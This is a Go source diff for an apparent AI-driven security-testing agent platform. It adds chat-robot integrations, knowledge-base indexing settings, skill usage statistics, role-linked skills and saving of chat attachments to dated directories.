Dingtalk RobotDingtalkConfig `yaml:"dingtalk,omitempty" json:"dingtalk,omitempty"` // 钉钉
Lark RobotLarkConfig `yaml:"lark,omitempty" json:"lark,omitempty"` // 飞书
}
// RobotWecomConfig 企业微信机器人配置
type RobotWecomConfig struct {
Enabled bool `yaml:"enabled" json:"enabled"`
Token string `yaml:"token" json:"token"` // 回调 URL 校验 Token
EncodingAESKey string `yaml:"encoding_aes_key" json:"encoding_aes_key"` // EncodingAESKey
CorpID string `yaml:"corp_id" json:"corp_id"` // 企业 ID
Secret string `yaml:"secret" json:"secret"` // 应用 Secret
AgentID int64 `yaml:"agent_id" json:"agent_id"` // 应用 AgentId
}
// RobotDingtalkConfig 钉钉机器人配置
type RobotDingtalkConfig struct {
Enabled bool `yaml:"enabled" json:"enabled"`
ClientID string `yaml:"client_id" json:"client_id"` // 应用 Key (AppKey)
ClientSecret string `yaml:"client_secret" json:"client_secret"` // 应用 Secret
}
// RobotLarkConfig 飞书机器人配置
type RobotLarkConfig struct {
Enabled bool `yaml:"enabled" json:"enabled"`
AppID string `yaml:"app_id" json:"app_id"` // 应用 App ID
AppSecret string `yaml:"app_secret" json:"app_secret"` // 应用 App Secret
VerifyToken string `yaml:"verify_token" json:"verify_token"` // 事件订阅 Verification Token(可选)
}
type ServerConfig struct {
@@ -50,9 +86,17 @@ type OpenAIConfig struct {
MaxTotalTokens int `yaml:"max_total_tokens,omitempty" json:"max_total_tokens,omitempty"`
}
type FofaConfig struct {
// Email 为 FOFA 账号邮箱;APIKey 为 FOFA API Key(建议使用只读权限的 Key)
Email string `yaml:"email,omitempty" json:"email,omitempty"`
APIKey string `yaml:"api_key,omitempty" json:"api_key,omitempty"`
BaseURL string `yaml:"base_url,omitempty" json:"base_url,omitempty"` // 默认 https://fofa.info/api/v1/search/all
}
type SecurityConfig struct {
Tools []ToolConfig `yaml:"tools,omitempty"` // 向后兼容:支持在主配置文件中定义工具
ToolsDir string `yaml:"tools_dir,omitempty"` // 工具配置文件目录(新方式)
Tools []ToolConfig `yaml:"tools,omitempty"` // 向后兼容:支持在主配置文件中定义工具
ToolsDir string `yaml:"tools_dir,omitempty"` // 工具配置文件目录(新方式)
ToolDescriptionMode string `yaml:"tool_description_mode,omitempty"` // 工具描述模式: "short" | "full",默认 short
}
type DatabaseConfig struct {
@@ -82,13 +126,14 @@ type ExternalMCPConfig struct {
// ExternalMCPServerConfig 外部MCP服务器配置
type ExternalMCPServerConfig struct {
// stdio模式配置
Command string `yaml:"command,omitempty" json:"command,omitempty"`
Args []string `yaml:"args,omitempty" json:"args,omitempty"`
Command string `yaml:"command,omitempty" json:"command,omitempty"`
Args []string `yaml:"args,omitempty" json:"args,omitempty"`
Env map[string]string `yaml:"env,omitempty" json:"env,omitempty"` // 环境变量(用于stdio模式)
// HTTP模式配置
Transport string `yaml:"transport,omitempty" json:"transport,omitempty"` // "http" 或 "stdio"
URL string `yaml:"url,omitempty" json:"url,omitempty"`
Transport string `yaml:"transport,omitempty" json:"transport,omitempty"` // "stdio" | "sse" | "http"(Streamable) | "simple_http"(自建/简单POST端点,如本机 http://127.0.0.1:8081/mcp)
URL string `yaml:"url,omitempty" json:"url,omitempty"`
Headers map[string]string `yaml:"headers,omitempty" json:"headers,omitempty"` // HTTP/SSE 请求头(如 x-api-key
// 通用配置
Description string `yaml:"description,omitempty" json:"description,omitempty"`
@@ -107,8 +152,8 @@ type ToolConfig struct {
ShortDescription string `yaml:"short_description,omitempty"` // 简短描述(用于工具列表,减少token消耗)
Description string `yaml:"description"` // 详细描述(用于工具文档)
Enabled bool `yaml:"enabled"`
Parameters []ParameterConfig `yaml:"parameters,omitempty"` // 参数定义(可选)
ArgMapping string `yaml:"arg_mapping,omitempty"` // 参数映射方式: "auto", "manual", "template"(可选)
Parameters []ParameterConfig `yaml:"parameters,omitempty"` // 参数定义(可选)
ArgMapping string `yaml:"arg_mapping,omitempty"` // 参数映射方式: "auto", "manual", "template"(可选)
AllowedExitCodes []int `yaml:"allowed_exit_codes,omitempty"` // 允许的退出码列表(某些工具在成功时也返回非零退出码)
}
@@ -466,7 +511,7 @@ func LoadRoleFromFile(path string) (*RoleConfig, error) {
icon := role.Icon
// 去除可能的引号
icon = strings.Trim(icon, `"`)
// 检查是否是 Unicode 转义格式 \U0001F3C68位十六进制)或 \uXXXX(4位十六进制)
if len(icon) >= 3 && icon[0] == '\\' {
if icon[1] == 'U' && len(icon) >= 10 {
@@ -537,9 +582,18 @@ func Default() *Config {
},
Retrieval: RetrievalConfig{
TopK: 5,
SimilarityThreshold: 0.7,
SimilarityThreshold: 0.65, // 降低阈值到 0.65,减少漏检
HybridWeight: 0.7,
},
Indexing: IndexingConfig{
ChunkSize: 768, // 增加到 768,更好的上下文保持
ChunkOverlap: 50,
MaxChunksPerItem: 20, // 限制单个知识项最多 20 个块,避免消耗过多配额
MaxRPM: 100, // 默认 100 RPM,避免 429 错误
RateLimitDelayMs: 600, // 600ms 间隔,对应 100 RPM
MaxRetries: 3,
RetryDelayMs: 1000,
},
},
}
}
@@ -550,6 +604,26 @@ type KnowledgeConfig struct {
BasePath string `yaml:"base_path" json:"base_path"` // 知识库路径
Embedding EmbeddingConfig `yaml:"embedding" json:"embedding"`
Retrieval RetrievalConfig `yaml:"retrieval" json:"retrieval"`
Indexing IndexingConfig `yaml:"indexing,omitempty" json:"indexing,omitempty"` // 索引构建配置
}
// IndexingConfig 索引构建配置(用于控制知识库索引构建时的行为)
type IndexingConfig struct {
// 分块配置
ChunkSize int `yaml:"chunk_size,omitempty" json:"chunk_size,omitempty"` // 每个块的最大 token 数(估算),默认 512
ChunkOverlap int `yaml:"chunk_overlap,omitempty" json:"chunk_overlap,omitempty"` // 块之间的重叠 token 数,默认 50
MaxChunksPerItem int `yaml:"max_chunks_per_item,omitempty" json:"max_chunks_per_item,omitempty"` // 单个知识项的最大块数量,0 表示不限制
// 速率限制配置(用于避免 API 速率限制)
RateLimitDelayMs int `yaml:"rate_limit_delay_ms,omitempty" json:"rate_limit_delay_ms,omitempty"` // 请求间隔时间(毫秒),0 表示不使用固定延迟
MaxRPM int `yaml:"max_rpm,omitempty" json:"max_rpm,omitempty"` // 每分钟最大请求数,0 表示不限制
// 重试配置(用于处理临时错误)
MaxRetries int `yaml:"max_retries,omitempty" json:"max_retries,omitempty"` // 最大重试次数,默认 3
RetryDelayMs int `yaml:"retry_delay_ms,omitempty" json:"retry_delay_ms,omitempty"` // 重试间隔(毫秒),默认 1000
// 批处理配置(用于批量嵌入,当前未使用,保留扩展)
BatchSize int `yaml:"batch_size,omitempty" json:"batch_size,omitempty"` // 批量处理大小,0 表示逐个处理
}
// EmbeddingConfig 嵌入配置
@@ -575,11 +649,12 @@ type RolesConfig struct {
// RoleConfig 单个角色配置
type RoleConfig struct {
Name string `yaml:"name" json:"name"` // 角色名称
Description string `yaml:"description" json:"description"` // 角色描述
UserPrompt string `yaml:"user_prompt" json:"user_prompt"` // 用户提示词(追加到用户消息前)
Icon string `yaml:"icon,omitempty" json:"icon,omitempty"` // 角色图标(可选)
Tools []string `yaml:"tools,omitempty" json:"tools,omitempty"` // 关联的工具列表(toolKey格式,如 "toolName" 或 "mcpName::toolName"
MCPs []string `yaml:"mcps,omitempty" json:"mcps,omitempty"` // 向后兼容:关联的MCP服务器列表(已废弃,使用tools替代)
Enabled bool `yaml:"enabled" json:"enabled"` // 是否启用
Name string `yaml:"name" json:"name"` // 角色名称
Description string `yaml:"description" json:"description"` // 角色描述
UserPrompt string `yaml:"user_prompt" json:"user_prompt"` // 用户提示词(追加到用户消息前)
Icon string `yaml:"icon,omitempty" json:"icon,omitempty"` // 角色图标(可选)
Tools []string `yaml:"tools,omitempty" json:"tools,omitempty"` // 关联的工具列表(toolKey格式,如 "toolName" 或 "mcpName::toolName"
MCPs []string `yaml:"mcps,omitempty" json:"mcps,omitempty"` // 向后兼容:关联的MCP服务器列表(已废弃,使用tools替代)
Skills []string `yaml:"skills,omitempty" json:"skills,omitempty"` // 关联的skills列表(skill名称列表,在执行任务前会读取这些skills的内容)
Enabled bool `yaml:"enabled" json:"enabled"` // 是否启用
}
+20 -2
View File
@@ -223,12 +223,30 @@ func (db *DB) UpdateConversationTime(id string) error {
return nil
}
// DeleteConversation 删除对话
// DeleteConversation 删除对话及其所有相关数据
// 由于数据库外键约束设置了 ON DELETE CASCADE,删除对话时会自动删除:
// - messages(消息)
// - process_details(过程详情)
// - attack_chain_nodes(攻击链节点)
// - attack_chain_edges(攻击链边)
// - vulnerabilities(漏洞)
// - conversation_group_mappings(分组映射)
// 注意:knowledge_retrieval_logs 使用 ON DELETE SET NULL,记录会保留但 conversation_id 会被设为 NULL
func (db *DB) DeleteConversation(id string) error {
_, err := db.Exec("DELETE FROM conversations WHERE id = ?", id)
// 显式删除知识检索日志(虽然外键是SET NULL,但为了彻底清理,我们手动删除)
_, err := db.Exec("DELETE FROM knowledge_retrieval_logs WHERE conversation_id = ?", id)
if err != nil {
db.logger.Warn("删除知识检索日志失败", zap.String("conversationId", id), zap.Error(err))
// 不返回错误,继续删除对话
}
// 删除对话(外键CASCADE会自动删除其他相关数据)
_, err = db.Exec("DELETE FROM conversations WHERE id = ?", id)
if err != nil {
return fmt.Errorf("删除对话失败: %w", err)
}
db.logger.Info("对话及其所有相关数据已删除", zap.String("conversationId", id))
return nil
}
+15
View File
@@ -104,6 +104,17 @@ func (db *DB) initTables() error {
updated_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP
);`
// 创建Skills统计表
createSkillStatsTable := `
CREATE TABLE IF NOT EXISTS skill_stats (
skill_name TEXT PRIMARY KEY,
total_calls INTEGER NOT NULL DEFAULT 0,
success_calls INTEGER NOT NULL DEFAULT 0,
failed_calls INTEGER NOT NULL DEFAULT 0,
last_call_time DATETIME,
updated_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP
);`
// 创建攻击链节点表
createAttackChainNodesTable := `
CREATE TABLE IF NOT EXISTS attack_chain_nodes (
@@ -264,6 +275,10 @@ func (db *DB) initTables() error {
return fmt.Errorf("创建tool_stats表失败: %w", err)
}
if _, err := db.Exec(createSkillStatsTable); err != nil {
return fmt.Errorf("创建skill_stats表失败: %w", err)
}
if _, err := db.Exec(createAttackChainNodesTable); err != nil {
return fmt.Errorf("创建attack_chain_nodes表失败: %w", err)
}
+142
View File
@@ -0,0 +1,142 @@
package database
import (
"database/sql"
"time"
"go.uber.org/zap"
)
// SkillStats Skills统计信息
type SkillStats struct {
SkillName string
TotalCalls int
SuccessCalls int
FailedCalls int
LastCallTime *time.Time
}
// SaveSkillStats 保存Skills统计信息
func (db *DB) SaveSkillStats(skillName string, stats *SkillStats) error {
var lastCallTime sql.NullTime
if stats.LastCallTime != nil {
lastCallTime = sql.NullTime{Time: *stats.LastCallTime, Valid: true}
}
query := `
INSERT OR REPLACE INTO skill_stats
(skill_name, total_calls, success_calls, failed_calls, last_call_time, updated_at)
VALUES (?, ?, ?, ?, ?, ?)
`
_, err := db.Exec(query,
skillName,
stats.TotalCalls,
stats.SuccessCalls,
stats.FailedCalls,
lastCallTime,
time.Now(),
)
if err != nil {
db.logger.Error("保存Skills统计信息失败", zap.Error(err), zap.String("skillName", skillName))
return err
}
return nil
}
// LoadSkillStats 加载所有Skills统计信息
func (db *DB) LoadSkillStats() (map[string]*SkillStats, error) {
query := `
SELECT skill_name, total_calls, success_calls, failed_calls, last_call_time
FROM skill_stats
`
rows, err := db.Query(query)
if err != nil {
return nil, err
}
defer rows.Close()
stats := make(map[string]*SkillStats)
for rows.Next() {
var stat SkillStats
var lastCallTime sql.NullTime
err := rows.Scan(
&stat.SkillName,
&stat.TotalCalls,
&stat.SuccessCalls,
&stat.FailedCalls,
&lastCallTime,
)
if err != nil {
db.logger.Warn("加载Skills统计信息失败", zap.Error(err))
continue
}
if lastCallTime.Valid {
stat.LastCallTime = &lastCallTime.Time
}
stats[stat.SkillName] = &stat
}
return stats, nil
}
// UpdateSkillStats 更新Skills统计信息(累加模式)
func (db *DB) UpdateSkillStats(skillName string, totalCalls, successCalls, failedCalls int, lastCallTime *time.Time) error {
var lastCallTimeSQL sql.NullTime
if lastCallTime != nil {
lastCallTimeSQL = sql.NullTime{Time: *lastCallTime, Valid: true}
}
query := `
INSERT INTO skill_stats (skill_name, total_calls, success_calls, failed_calls, last_call_time, updated_at)
VALUES (?, ?, ?, ?, ?, ?)
ON CONFLICT(skill_name) DO UPDATE SET
total_calls = total_calls + ?,
success_calls = success_calls + ?,
failed_calls = failed_calls + ?,
last_call_time = COALESCE(?, last_call_time),
updated_at = ?
`
_, err := db.Exec(query,
skillName, totalCalls, successCalls, failedCalls, lastCallTimeSQL, time.Now(),
totalCalls, successCalls, failedCalls, lastCallTimeSQL, time.Now(),
)
if err != nil {
db.logger.Error("更新Skills统计信息失败", zap.Error(err), zap.String("skillName", skillName))
return err
}
return nil
}
// ClearSkillStats 清空所有Skills统计信息
func (db *DB) ClearSkillStats() error {
query := `DELETE FROM skill_stats`
_, err := db.Exec(query)
if err != nil {
db.logger.Error("清空Skills统计信息失败", zap.Error(err))
return err
}
db.logger.Info("已清空所有Skills统计信息")
return nil
}
// ClearSkillStatsByName 清空指定skill的统计信息
func (db *DB) ClearSkillStatsByName(skillName string) error {
query := `DELETE FROM skill_stats WHERE skill_name = ?`
_, err := db.Exec(query, skillName)
if err != nil {
db.logger.Error("清空指定skill统计信息失败", zap.Error(err), zap.String("skillName", skillName))
return err
}
db.logger.Info("已清空指定skill统计信息", zap.String("skillName", skillName))
return nil
}
+321 -15
View File
@@ -2,10 +2,14 @@ package handler
import (
"context"
"crypto/rand"
"encoding/base64"
"encoding/json"
"errors"
"fmt"
"net/http"
"os"
"path/filepath"
"strconv"
"strings"
"time"
@@ -15,6 +19,7 @@ import (
"cyberstrike-ai/internal/config"
"cyberstrike-ai/internal/database"
"cyberstrike-ai/internal/mcp/builtin"
"cyberstrike-ai/internal/skills"
"github.com/gin-gonic/gin"
"go.uber.org/zap"
@@ -72,6 +77,7 @@ type AgentHandler struct {
knowledgeManager interface { // 知识库管理器接口
LogRetrieval(conversationID, messageID, query, riskType string, retrievedItems []string) error
}
skillsManager *skills.Manager // Skills管理器
}
// NewAgentHandler 创建新的Agent处理器
@@ -101,11 +107,137 @@ func (h *AgentHandler) SetKnowledgeManager(manager interface {
h.knowledgeManager = manager
}
// SetSkillsManager 设置Skills管理器
func (h *AgentHandler) SetSkillsManager(manager *skills.Manager) {
h.skillsManager = manager
}
// ChatAttachment 聊天附件(用户上传的文件)
type ChatAttachment struct {
FileName string `json:"fileName"` // 文件名
Content string `json:"content"` // 文本内容或 base64(由 MimeType 决定是否解码)
MimeType string `json:"mimeType,omitempty"`
}
// ChatRequest 聊天请求
type ChatRequest struct {
Message string `json:"message" binding:"required"`
ConversationID string `json:"conversationId,omitempty"`
Role string `json:"role,omitempty"` // 角色名称
Message string `json:"message" binding:"required"`
ConversationID string `json:"conversationId,omitempty"`
Role string `json:"role,omitempty"` // 角色名称
Attachments []ChatAttachment `json:"attachments,omitempty"`
}
const (
maxAttachments = 10
chatUploadsDirName = "chat_uploads" // 对话附件保存的根目录(相对当前工作目录)
)
// saveAttachmentsToDateAndConversationDir 将附件保存到 chat_uploads/YYYY-MM-DD/{conversationID}/,返回每个文件的保存路径(与 attachments 顺序一致)
// conversationID 为空时使用 "_new" 作为目录名(新对话尚未有 ID)
func saveAttachmentsToDateAndConversationDir(attachments []ChatAttachment, conversationID string, logger *zap.Logger) (savedPaths []string, err error) {
if len(attachments) == 0 {
return nil, nil
}
cwd, err := os.Getwd()
if err != nil {
return nil, fmt.Errorf("获取当前工作目录失败: %w", err)
}
dateDir := filepath.Join(cwd, chatUploadsDirName, time.Now().Format("2006-01-02"))
convDirName := strings.TrimSpace(conversationID)
if convDirName == "" {
convDirName = "_new"
} else {
convDirName = strings.ReplaceAll(convDirName, string(filepath.Separator), "_")
}
targetDir := filepath.Join(dateDir, convDirName)
if err = os.MkdirAll(targetDir, 0755); err != nil {
return nil, fmt.Errorf("创建上传目录失败: %w", err)
}
savedPaths = make([]string, 0, len(attachments))
for i, a := range attachments {
raw, decErr := attachmentContentToBytes(a)
if decErr != nil {
return nil, fmt.Errorf("附件 %s 解码失败: %w", a.FileName, decErr)
}
baseName := filepath.Base(a.FileName)
if baseName == "" || baseName == "." {
baseName = "file"
}
baseName = strings.ReplaceAll(baseName, string(filepath.Separator), "_")
ext := filepath.Ext(baseName)
nameNoExt := strings.TrimSuffix(baseName, ext)
suffix := fmt.Sprintf("_%s_%s", time.Now().Format("150405"), shortRand(6))
var unique string
if ext != "" {
unique = nameNoExt + suffix + ext
} else {
unique = baseName + suffix
}
fullPath := filepath.Join(targetDir, unique)
if err = os.WriteFile(fullPath, raw, 0644); err != nil {
return nil, fmt.Errorf("写入文件 %s 失败: %w", a.FileName, err)
}
absPath, _ := filepath.Abs(fullPath)
savedPaths = append(savedPaths, absPath)
if logger != nil {
logger.Debug("对话附件已保存", zap.Int("index", i+1), zap.String("fileName", a.FileName), zap.String("path", absPath))
}
}
return savedPaths, nil
}
func shortRand(n int) string {
const letters = "0123456789abcdef"
b := make([]byte, n)
_, _ = rand.Read(b)
for i := range b {
b[i] = letters[int(b[i])%len(letters)]
}
return string(b)
}
func attachmentContentToBytes(a ChatAttachment) ([]byte, error) {
content := a.Content
if decoded, err := base64.StdEncoding.DecodeString(content); err == nil && len(decoded) > 0 {
return decoded, nil
}
return []byte(content), nil
}
// userMessageContentForStorage 返回要存入数据库的用户消息内容:有附件时在正文后追加附件名(及路径),刷新后仍能显示,继续对话时大模型也能从历史中拿到路径
func userMessageContentForStorage(message string, attachments []ChatAttachment, savedPaths []string) string {
if len(attachments) == 0 {
return message
}
var b strings.Builder
b.WriteString(message)
for i, a := range attachments {
b.WriteString("\n📎 ")
b.WriteString(a.FileName)
if i < len(savedPaths) && savedPaths[i] != "" {
b.WriteString(": ")
b.WriteString(savedPaths[i])
}
}
return b.String()
}
// appendAttachmentsToMessage 仅将附件的保存路径追加到用户消息末尾,不再内联附件内容,避免上下文过长
func appendAttachmentsToMessage(msg string, attachments []ChatAttachment, savedPaths []string) string {
if len(attachments) == 0 {
return msg
}
var b strings.Builder
b.WriteString(msg)
b.WriteString("\n\n[用户上传的文件已保存到以下路径(请按需读取文件内容,而不是依赖内联内容)]\n")
for i, a := range attachments {
if i < len(savedPaths) && savedPaths[i] != "" {
b.WriteString(fmt.Sprintf("- %s: %s\n", a.FileName, savedPaths[i]))
} else {
b.WriteString(fmt.Sprintf("- %s: (路径未知,可能保存失败)\n", a.FileName))
}
}
return b.String()
}
// ChatResponse 聊天响应
@@ -140,6 +272,14 @@ func (h *AgentHandler) AgentLoop(c *gin.Context) {
return
}
conversationID = conv.ID
} else {
// 验证对话是否存在
_, err := h.db.GetConversation(conversationID)
if err != nil {
h.logger.Error("对话不存在", zap.String("conversationId", conversationID), zap.Error(err))
c.JSON(http.StatusNotFound, gin.H{"error": "对话不存在"})
return
}
}
// 优先尝试从保存的ReAct数据恢复历史上下文
@@ -166,9 +306,16 @@ func (h *AgentHandler) AgentLoop(c *gin.Context) {
h.logger.Info("从ReAct数据恢复历史上下文", zap.Int("count", len(agentHistoryMessages)))
}
// 校验附件数量(非流式)
if len(req.Attachments) > maxAttachments {
c.JSON(http.StatusBadRequest, gin.H{"error": fmt.Sprintf("附件最多 %d 个", maxAttachments)})
return
}
// 应用角色用户提示词和工具配置
finalMessage := req.Message
var roleTools []string // 角色配置的工具列表
var roleSkills []string // 角色配置的skills列表(用于提示AI,但不硬编码内容)
if req.Role != "" && req.Role != "默认" {
if h.config.Roles != nil {
if role, exists := h.config.Roles[req.Role]; exists && role.Enabled {
@@ -182,18 +329,37 @@ func (h *AgentHandler) AgentLoop(c *gin.Context) {
roleTools = role.Tools
h.logger.Info("使用角色配置的工具列表", zap.String("role", req.Role), zap.Int("toolCount", len(roleTools)))
}
// 获取角色配置的skills列表(用于在系统提示词中提示AI,但不硬编码内容)
if len(role.Skills) > 0 {
roleSkills = role.Skills
h.logger.Info("角色配置了skills,将在系统提示词中提示AI", zap.String("role", req.Role), zap.Int("skillCount", len(roleSkills)), zap.Strings("skills", roleSkills))
}
}
}
}
var savedPaths []string
if len(req.Attachments) > 0 {
savedPaths, err = saveAttachmentsToDateAndConversationDir(req.Attachments, conversationID, h.logger)
if err != nil {
h.logger.Error("保存对话附件失败", zap.Error(err))
c.JSON(http.StatusInternalServerError, gin.H{"error": "保存上传文件失败: " + err.Error()})
return
}
}
finalMessage = appendAttachmentsToMessage(finalMessage, req.Attachments, savedPaths)
// 保存用户消息(保存原始消息,不包含角色提示词)
_, err = h.db.AddMessage(conversationID, "user", req.Message, nil)
// 保存用户消息:有附件时一并保存附件名与路径,刷新后显示、继续对话时大模型也能从历史中拿到路径
userContent := userMessageContentForStorage(req.Message, req.Attachments, savedPaths)
_, err = h.db.AddMessage(conversationID, "user", userContent, nil)
if err != nil {
h.logger.Error("保存用户消息失败", zap.Error(err))
c.JSON(http.StatusInternalServerError, gin.H{"error": "保存用户消息失败: " + err.Error()})
return
}
// 执行Agent Loop,传入历史消息和对话ID(使用包含角色提示词的finalMessage和角色工具列表)
result, err := h.agent.AgentLoopWithProgress(c.Request.Context(), finalMessage, agentHistoryMessages, conversationID, nil, roleTools)
// 注意:skills不会硬编码注入,但会在系统提示词中提示AI这个角色推荐使用哪些skills
result, err := h.agent.AgentLoopWithProgress(c.Request.Context(), finalMessage, agentHistoryMessages, conversationID, nil, roleTools, roleSkills)
if err != nil {
h.logger.Error("Agent Loop执行失败", zap.Error(err))
@@ -214,6 +380,8 @@ func (h *AgentHandler) AgentLoop(c *gin.Context) {
_, err = h.db.AddMessage(conversationID, "assistant", result.Response, result.MCPExecutionIDs)
if err != nil {
h.logger.Error("保存助手消息失败", zap.Error(err))
// 即使保存失败,也返回响应,但记录错误
// 因为AI已经生成了回复,用户应该能看到
}
// 保存最后一轮ReAct的输入和输出
@@ -233,6 +401,96 @@ func (h *AgentHandler) AgentLoop(c *gin.Context) {
})
}
// ProcessMessageForRobot 供机器人(企业微信/钉钉/飞书)调用:与 /api/agent-loop/stream 相同执行路径(含 progressCallback、过程详情),仅不发送 SSE,最后返回完整回复
func (h *AgentHandler) ProcessMessageForRobot(ctx context.Context, conversationID, message, role string) (response string, convID string, err error) {
if conversationID == "" {
title := safeTruncateString(message, 50)
conv, createErr := h.db.CreateConversation(title)
if createErr != nil {
return "", "", fmt.Errorf("创建对话失败: %w", createErr)
}
conversationID = conv.ID
} else {
if _, getErr := h.db.GetConversation(conversationID); getErr != nil {
return "", "", fmt.Errorf("对话不存在")
}
}
agentHistoryMessages, err := h.loadHistoryFromReActData(conversationID)
if err != nil {
historyMessages, getErr := h.db.GetMessages(conversationID)
if getErr != nil {
agentHistoryMessages = []agent.ChatMessage{}
} else {
agentHistoryMessages = make([]agent.ChatMessage, 0, len(historyMessages))
for _, msg := range historyMessages {
agentHistoryMessages = append(agentHistoryMessages, agent.ChatMessage{Role: msg.Role, Content: msg.Content})
}
}
}
finalMessage := message
var roleTools, roleSkills []string
if role != "" && role != "默认" && h.config.Roles != nil {
if r, exists := h.config.Roles[role]; exists && r.Enabled {
if r.UserPrompt != "" {
finalMessage = r.UserPrompt + "\n\n" + message
}
roleTools = r.Tools
roleSkills = r.Skills
}
}
if _, err = h.db.AddMessage(conversationID, "user", message, nil); err != nil {
return "", "", fmt.Errorf("保存用户消息失败: %w", err)
}
// 与 agent-loop/stream 一致:先创建助手消息占位,用 progressCallback 写过程详情(不发送 SSE)
assistantMsg, err := h.db.AddMessage(conversationID, "assistant", "处理中...", nil)
if err != nil {
h.logger.Warn("机器人:创建助手消息占位失败", zap.Error(err))
}
var assistantMessageID string
if assistantMsg != nil {
assistantMessageID = assistantMsg.ID
}
progressCallback := h.createProgressCallback(conversationID, assistantMessageID, nil)
result, err := h.agent.AgentLoopWithProgress(ctx, finalMessage, agentHistoryMessages, conversationID, progressCallback, roleTools, roleSkills)
if err != nil {
errMsg := "执行失败: " + err.Error()
if assistantMessageID != "" {
_, _ = h.db.Exec("UPDATE messages SET content = ? WHERE id = ?", errMsg, assistantMessageID)
_ = h.db.AddProcessDetail(assistantMessageID, conversationID, "error", errMsg, nil)
}
return "", conversationID, err
}
// 更新助手消息内容与 MCP 执行 ID(与 stream 一致)
if assistantMessageID != "" {
mcpIDsJSON := ""
if len(result.MCPExecutionIDs) > 0 {
jsonData, _ := json.Marshal(result.MCPExecutionIDs)
mcpIDsJSON = string(jsonData)
}
_, err = h.db.Exec(
"UPDATE messages SET content = ?, mcp_execution_ids = ? WHERE id = ?",
result.Response, mcpIDsJSON, assistantMessageID,
)
if err != nil {
h.logger.Warn("机器人:更新助手消息失败", zap.Error(err))
}
} else {
if _, err = h.db.AddMessage(conversationID, "assistant", result.Response, result.MCPExecutionIDs); err != nil {
h.logger.Warn("机器人:保存助手消息失败", zap.Error(err))
}
}
if result.LastReActInput != "" || result.LastReActOutput != "" {
_ = h.db.SaveReActData(conversationID, result.LastReActInput, result.LastReActOutput)
}
return result.Response, conversationID, nil
}
// StreamEvent 流式事件
type StreamEvent struct {
Type string `json:"type"` // conversation, progress, tool_call, tool_result, response, error, cancelled, done
@@ -465,12 +723,19 @@ func (h *AgentHandler) AgentLoopStream(c *gin.Context) {
return
}
conversationID = conv.ID
sendEvent("conversation", "会话已创建", map[string]interface{}{
"conversationId": conversationID,
})
} else {
// 验证对话是否存在
_, err := h.db.GetConversation(conversationID)
if err != nil {
h.logger.Error("对话不存在", zap.String("conversationId", conversationID), zap.Error(err))
sendEvent("error", "对话不存在", nil)
return
}
}
sendEvent("conversation", "会话已创建", map[string]interface{}{
"conversationId": conversationID,
})
// 优先尝试从保存的ReAct数据恢复历史上下文
agentHistoryMessages, err := h.loadHistoryFromReActData(conversationID)
if err != nil {
@@ -495,6 +760,12 @@ func (h *AgentHandler) AgentLoopStream(c *gin.Context) {
h.logger.Info("从ReAct数据恢复历史上下文", zap.Int("count", len(agentHistoryMessages)))
}
// 校验附件数量
if len(req.Attachments) > maxAttachments {
sendEvent("error", fmt.Sprintf("附件最多 %d 个", maxAttachments), nil)
return
}
// 应用角色用户提示词和工具配置
finalMessage := req.Message
var roleTools []string // 角色配置的工具列表
@@ -515,13 +786,29 @@ func (h *AgentHandler) AgentLoopStream(c *gin.Context) {
// 因为mcps是MCP服务器名称,不是工具列表
h.logger.Info("角色配置使用旧的mcps字段,将使用所有工具", zap.String("role", req.Role))
}
// 注意:角色配置的skills不再硬编码注入,AI可以通过list_skills和read_skill工具按需调用
if len(role.Skills) > 0 {
h.logger.Info("角色配置了skillsAI可通过工具按需调用", zap.String("role", req.Role), zap.Int("skillCount", len(role.Skills)), zap.Strings("skills", role.Skills))
}
}
}
}
var savedPaths []string
if len(req.Attachments) > 0 {
savedPaths, err = saveAttachmentsToDateAndConversationDir(req.Attachments, conversationID, h.logger)
if err != nil {
h.logger.Error("保存对话附件失败", zap.Error(err))
sendEvent("error", "保存上传文件失败: "+err.Error(), nil)
return
}
}
// 仅将附件保存路径追加到 finalMessage,避免将文件内容内联到大模型上下文中
finalMessage = appendAttachmentsToMessage(finalMessage, req.Attachments, savedPaths)
// 如果roleTools为空,表示使用所有工具(默认角色或未配置工具的角色)
// 保存用户消息(保存原始消息,不包含角色提示词)
_, err = h.db.AddMessage(conversationID, "user", req.Message, nil)
// 保存用户消息:有附件时一并保存附件名与路径,刷新后显示、继续对话时大模型也能从历史中拿到路径
userContent := userMessageContentForStorage(req.Message, req.Attachments, savedPaths)
_, err = h.db.AddMessage(conversationID, "user", userContent, nil)
if err != nil {
h.logger.Error("保存用户消息失败", zap.Error(err))
}
@@ -599,7 +886,18 @@ func (h *AgentHandler) AgentLoopStream(c *gin.Context) {
// 执行Agent Loop,传入独立的上下文,确保任务不会因客户端断开而中断(使用包含角色提示词的finalMessage和角色工具列表)
sendEvent("progress", "正在分析您的请求...", nil)
result, err := h.agent.AgentLoopWithProgress(taskCtx, finalMessage, agentHistoryMessages, conversationID, progressCallback, roleTools)
// 注意:skills不会硬编码注入,但会在系统提示词中提示AI这个角色推荐使用哪些skills
var roleSkills []string // 角色配置的skills列表(用于提示AI,但不硬编码内容)
if req.Role != "" && req.Role != "默认" {
if h.config.Roles != nil {
if role, exists := h.config.Roles[req.Role]; exists && role.Enabled {
if len(role.Skills) > 0 {
roleSkills = role.Skills
}
}
}
}
result, err := h.agent.AgentLoopWithProgress(taskCtx, finalMessage, agentHistoryMessages, conversationID, progressCallback, roleTools, roleSkills)
if err != nil {
h.logger.Error("Agent Loop执行失败", zap.Error(err))
cause := context.Cause(baseCtx)
@@ -1099,6 +1397,7 @@ func (h *AgentHandler) executeBatchQueue(queueID string) {
// 应用角色用户提示词和工具配置
finalMessage := task.Message
var roleTools []string // 角色配置的工具列表
var roleSkills []string // 角色配置的skills列表(用于提示AI,但不硬编码内容)
if queue.Role != "" && queue.Role != "默认" {
if h.config.Roles != nil {
if role, exists := h.config.Roles[queue.Role]; exists && role.Enabled {
@@ -1112,6 +1411,11 @@ func (h *AgentHandler) executeBatchQueue(queueID string) {
roleTools = role.Tools
h.logger.Info("使用角色配置的工具列表", zap.String("queueId", queueID), zap.String("taskId", task.ID), zap.String("role", queue.Role), zap.Int("toolCount", len(roleTools)))
}
// 获取角色配置的skills列表(用于在系统提示词中提示AI,但不硬编码内容)
if len(role.Skills) > 0 {
roleSkills = role.Skills
h.logger.Info("角色配置了skills,将在系统提示词中提示AI", zap.String("queueId", queueID), zap.String("taskId", task.ID), zap.String("role", queue.Role), zap.Int("skillCount", len(roleSkills)), zap.Strings("skills", roleSkills))
}
}
}
}
